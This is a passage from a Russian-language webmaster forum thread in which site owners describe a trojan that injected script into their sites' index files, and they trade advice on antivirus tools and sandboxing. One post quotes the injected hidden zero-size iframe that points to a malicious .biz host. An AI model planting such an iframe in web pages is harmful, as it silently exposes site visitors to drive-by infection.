Опасная инъекция в сайты от mdfc.info - у меня заразились все 30 сайтов!

Chims
На сайте с 15.07.2006
Offline
49
#101
sEoK:
Вот и я подцепил похожий вирус.
На многих сайтах в файлы с именем "index" вставлен код java-скрипта, начало и конец которого сопровождается: <!-- ~df~ -->.

Тоже самое было, вначале думал что это из-за кривого скрипта опросника, а оказалось троянец :)

Я бы изменил мир, но Бог не дает исходников…
[Удален]
#102

Трояна распространял персонаж под ником NC.Luther, свежезабаненный на этом форуме. Просьба к админам- отдайте все его данные что у вас в базе, я позабочусь о нем через кое-какие украинские структуры, если он с Украины как писал.

TP
На сайте с 22.02.2007
Offline
39
#103

Делаем так :

1) Отгрызаем от винта 1.5 гига на новый раздел. Ставим туда новую систему ИСКЛЮЧИТЕЛЬНО для работы с AllSubmiter и после работы форматим раздел и потом востанавливаем его из копии, сохранёной перед работой в другом разделе.

2) Ещё можно сделать попроще : делаем учётную запись гостя - из под неё запускаем Субмитер. Гость не имеет права корячить реестр и системные файлы т.е сама винда не пострадает. Но я не знаю, будет ли работать такое дело т.к ещё не проверял.

3) Наймите кого нить для прогона :) Сбережёте нервы и машину :)

Арбитраж трафика: Покупаем трафик по 1WMR, на выходе имеем 20, на эти 2% и живём (http://www.mlm-master.net/index.php?showtopic=1111) Продаю качественные клики из тизерной сетки без ботов. Только крупный опт: от 5 копеек / клик (/ru/forum/430653)
Antony69
На сайте с 16.09.2004
Offline
146
#104
TrugenikPoley:
Делаем так :

1) Отгрызаем от винта 1.5 гига на новый раздел. Ставим туда новую систему ИСКЛЮЧИТЕЛЬНО для работы с AllSubmiter и после работы форматим раздел и потом востанавливаем его из копии, сохранёной перед работой в другом разделе.

2) Ещё можно сделать попроще : делаем учётную запись гостя - из под неё запускаем Субмитер. Гость не имеет права корячить реестр и системные файлы т.е сама винда не пострадает. Но я не знаю, будет ли работать такое дело т.к ещё не проверял.

3) Наймите кого нить для прогона :) Сбережёте нервы и машину :)

Антивирусы, я так понимаю нынче не в моде. Или вам вероисповедание им не позволяет ими пользоваться? Вы случайно не врач? Они перректальные методы практикуют...

Заметки SEO аналитика (http://www.seonotes.ru)
TOP GUN
На сайте с 21.11.2003
Offline
115
#105
Antony69:
Антивирусы, я так понимаю нынче не в моде. Или вам вероисповедание им не позволяет ими пользоваться? Вы случайно не врач? Они перректальные методы практикуют...

Если бы они ловили бы их, а то ручками их отлавливаешь 😂 😂 😂 Более менее опора на ЗонеАларм. Но с ним тоже геморно, то фтп постоянно из-за него рвется, то в админку CMS-ки не войти 😒

Мы тут решили расстрельную машину поставить, только для юзанья по каталогам.

[Удален]
#106
a-little-seo:
Однозначно рулит Drweb + Zonealarm .

Если сидите на ADSL, то счастье обретается покупкой сетевого модема с роутером (в нём аппаратный файрвол). 3-й год сижу со старичком Zyxel OMNI ADSL LAN EE - ни одна бяка не проскочила. Антивируса просто нет, ибо нах не нужен. А почтовые вложения левые не открывать у меня, слава богу, мозгов хватает.

SR
На сайте с 17.11.2005
Offline
214
#107
Antony69:
Антивирусы, я так понимаю нынче не в моде. Или вам вероисповедание им не позволяет ими пользоваться?

Многие антивирусы пропускают. Только поочередно все антивирусы в комплексе вроде как все отлавливают.

У меня все больше усиливается ощущение что разработчики антивирусов сами некоторые неопасные вирусы и пишут на радость юзеру :), а если что то серьезное подхватил то все эти касперсике, ноды как мертвому припарка.

Navi40
На сайте с 17.09.2006
Offline
84
#108

Ну вот и мой сайт словил.

<iframe src='http://…...biz/traff/iframe.php?u=all' height='0' width='0' scrolling='no' frameborder='no'></iframe>

Обратил внимание, когда насторожила необычно долгая загрузка главной.

Пока нашел только в index страницах. Поудалял.

Должен отметить, что и Norton и DrWeb увидели сразу. Всем удачи в борьбе.

Все будет хорошо!
Миша
На сайте с 26.02.2006
Offline
59
#109

Здрасьте, вот и я попался.... :( NOD 32 первоначально нашел его, но при удалении убил и часть системы. Пришлось начинать с нуля... Поставил винду, все проги, хостер заверил меня, что файлы он почистил... Резалт - перекинл файлы на локал и бабах!!! :) Щас придется читать досконально всю эту ветку и ковыряться вручную.... Думаю, все в курсе сколько нервов стОит переставить винду и начать с нуля фактически... :)

Самое обидное и грызущее совесть - эта дрянь вроде все еще висит на сайте и заражает всех юзеров с "дырявыми" эксплорерами... А сам боюсь проверить - там он все еще или уже нет... :) Есть ли способы проверить наверняка присутствует ли там эта дрять не эксплорером?

Русские НЕ СДАЮТСЯ!!!
Kislov
На сайте с 29.04.2006
Offline
185
#110

NOD32 удаляет его нормально. Правда библиотеку ИЕ тоже удаляет, ИЕ отказывается работать. И блокирует его на отлично.

Я хоть и учавствовал в этой ветку, а всё же наступил на эти грабли.

Меня насторожило одно. Не во все indexы он код дописывает. Думаю, что кто-то ручками работает. Ибо не во все шаблоны джумлы код прописали, а только в тот который подгружается.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий